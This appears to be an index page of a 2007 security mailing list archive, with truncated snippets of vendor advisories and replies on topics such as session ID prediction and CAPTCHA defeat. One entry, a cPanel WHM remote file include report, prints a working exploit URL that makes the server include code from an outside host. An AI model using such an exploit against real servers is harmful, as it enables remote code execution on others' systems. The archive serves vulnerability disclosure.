Re: local Calendar System v1.1 (lcStdLib.inc) Remote File Include

On Mon, 29 Jan 2007, Simple Nomad wrote: On Mon, 2007-01-29 at 13:00 -0600, Gadi Evron wrote: How can we all automate the testing process for fake vulns in and list them as such without overburdening OSVDB, CVE, Milworm and SecuriTeam? How about letting them get posted to bugtraq as ppl

[USN-417-2] PostgreSQL 8.1 regression

=== Ubuntu Security Notice USN-417-2 February 06, 2007 postgresql-8.1 regression https://launchpad.net/bugs/83505 === A security issue affects the following Ubuntu releases:

Medium level security hole in FreeProxy

The FreeProxy HTTP proxy server suffers from a denial of service condition which causes the server to hang. This occurs when an attacker makes a request for the hostname/portnumber combination in use by the server itself. The vendor was notified on the 10th January 2007 and a fix was made

[ MDKSA-2007:035 ] - Updated gd packages fix DoS vulnerability.

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:035 http://www.mandriva.com/security/

[ MDKSA-2007:036 ] - Updated libwmf packages fix embedded gd DoS vulnerability.

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:036 http://www.mandriva.com/security/

[ MDKSA-2007:037 ] - Updated postgresql packages address multiple vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:037 http://www.mandriva.com/security/

[ MDKSA-2007:038 ] - Updated php packages to address multiple issues

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:038 http://www.mandriva.com/security/

[SECURITY] [DSA 1258-1] New Mozilla Firefox packages fix several vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1258-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 7th, 2007

rPSA-2007-0026-1 samba samba-swat

rPath Security Advisory: 2007-0026-1 Published: 2007-02-07 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Local Deterministic Denial of Service Updated Versions: samba=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1 samba-swat=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1

XLNC1 Radio Classical Music Nuke Portal Remote File Inc. Vuln.

$ $ $ Title : XLNC1 Radio Classical Music Nuke Portal Remote File Inc. Vuln. $ Author: Gokhan $ Site : http://www.xlnc1.org/nuke $ Contact : [EMAIL PROTECTED] | [EMAIL PROTECTED] $ $ Vuln

Re: VBulletin AdminCP Index.PHP Multiple Cross-Site Scripting Vulnerability

I'm somewhat surprised that the reporter does not list the HTML template editor as a potential XSS attack vector too. Perhaps he considers uploading files via FTP to be a means of attack too? Yes, we allow *authenticated administrators* to enter HTML for certain values. This is the intended

Re: Jetty Session ID Prediction

Amit Klein wrote: Chris Anley wrote: Hi folks, I've posted a paper that explains a little more here: http://www.ngssoftware.com/research/papers/Randomness.pdf Nice paper. I do notice an enumeration loop over 2^16 possible 16-bit values. This can be improved as following (note: this is

[ MDKSA-2007:039 ] - Updated gtk+2.0 packages address DoS, LSB issues, several bugs

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:039 http://www.mandriva.com/security/

iDefense Security Advisory 02.07.07: RARLabs Unrar Password Prompt Buffer Overflow Vulnerability

RARLabs Unrar Password Prompt Buffer Overflow Vulnerability iDefense Security Advisory 02.07.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 07, 2007 I. BACKGROUND Unrar is a command line archive extractor for Windows and Linux. For more information visit the vendor's site at the

iDefense Security Advisory 02.07.07: Trend Micro TmComm Local Privilege Escalation Vulnerability

Trend Micro TmComm Local Privilege Escalation Vulnerability iDefense Security Advisory 02.07.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 07, 2007 I. BACKGROUND The Trend Micro AntiVirus scan engine is widely relied upon to provide AntiVirus capabilities to desktop, server, and

iDefense Security Advisory 02.07.07: Trend Micro AntiVirus UPX Parsing Kernel Buffer Overflow Vulnerability

Trend Micro AntiVirus UPX Parsing Kernel Buffer Overflow Vulnerability iDefense Security Advisory 02.07.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 07, 2007 I. BACKGROUND The Trend Micro AntiVirus scan engine provides anti-virus capabilities to desktop, server and gateway

remote file include in whm (all version)

name : web host manager vendor : cpanel.net by : s3rv3r_hack3r (ali [at] hackerz [dot] ir) web-site : www.hackerz.ir - ali.hackerz.ir exploit: http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?

Re: Defeating CAPTCHAs via Averaging

On Thursday 01 February 2007 01:52, Andreas Beck wrote: No, but it can be easily defeated by changing the placement/appearance of the number(s) as well as that of the noise or by keeping both constant over reloads. What is exploited here, is the fact that noise and payload behave differently

[ MDKSA-2007:040 ] - Updated kernel packages fix multiple vulnerabilities and bugs

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:040 http://www.mandriva.com/security/